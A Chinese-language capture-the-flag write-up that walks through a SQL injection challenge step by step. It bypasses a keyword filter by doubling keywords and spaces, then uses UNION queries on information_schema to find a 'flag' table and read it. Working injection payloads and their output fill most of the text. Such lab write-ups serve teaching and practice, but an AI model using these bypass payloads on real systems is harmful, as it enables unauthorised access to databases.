这题比较关键的地方就在于后台对不同关键字过滤方式不同。
- 输入数值1返回结果:
ID: 1 name: baloteli
在输入1'(注意输入法):You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
可见输入的是字符串类型,并且存在注入点。 - 由于题目问过滤了什么,干脆将几个关键字一起写出来,输入如下语句:
1 and or # -- union select from where
ID: 1 or where name: baloteli
- 开始爆表名,在之前应该先猜解union需要的列数,我直接猜的1列:
1' ununionion seselectlect 1 frofromm information_schema.tables where '1'='1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ununionion seselectlect 1 frofromm information_schema.tables '1'='1'' at line 1
尴尬了。。几个关键字竟然没有成功绕过,猜想过滤时应该是从单词开始进行匹配的,那么可以尝试将两个同样的关键字首尾连起来测试,并且从返回结果还可以看到where关键字被过滤了(不知道为什么第一步中没被过滤)。1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'unionselecttable_name frominformation_schema.tables where'1'='1'' at line 1
又报错了,但是可以发现几个关键字已经绕过过滤了,但是他们却连在了一起,可能空格已被过滤了,再试试1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1
就是用两个空格代替一个,方法和关键字一样。然后直接返回一大堆结果,可以发现一个特殊的表名ID: 1' union select table_name from information_schema.tables where '1'='1 name: flag
- 爆出列名:
1' unionunion selectselect column_name fromfrom information_schema.columns wherewhere table_name='flag
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from where table_name='flag'' at line 1
information_schema.columns跑哪了?估计被过滤了1' unionunion selectselect column_name fromfrom information_schema.columnsinformation_schema.columns wherewhere table_name='flag
结果仍然是刚才的错误警告,不知道后台怎么过滤的,再换一种ab(abc)c形式的过滤1' unionunion selectselect column_name fromfrom information_schema.coluinformation_schema.columnsmns wherewhere table_name='flag
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where table_name='flag'' at line 1
这下有点懵了,这会是什么错误?想了半天,可能是把column_name也给过滤了吧:1' unionunion selectselect column_namcolumn_namee fromfrom information_schema.coluinformation_schema.columnsmns wherewhere table_name='flag
ID: 1' union select column_name from information_schema.columns where table_name='flag name: baloteli ID: 1' union select column_name from information_schema.columns where table_name='flag name: flag ID: 1' union select column_name from information_schema.columns where table_name='flag name: id
找到特殊列flag - 直接查询flag:
1' unionunion selectselect flag fromfrom flag wherewhere '1'='1
ID: 1' union select flag from flag where '1'='1 name: baloteli ID: 1' union select flag from flag where '1'='1 name: flag{******}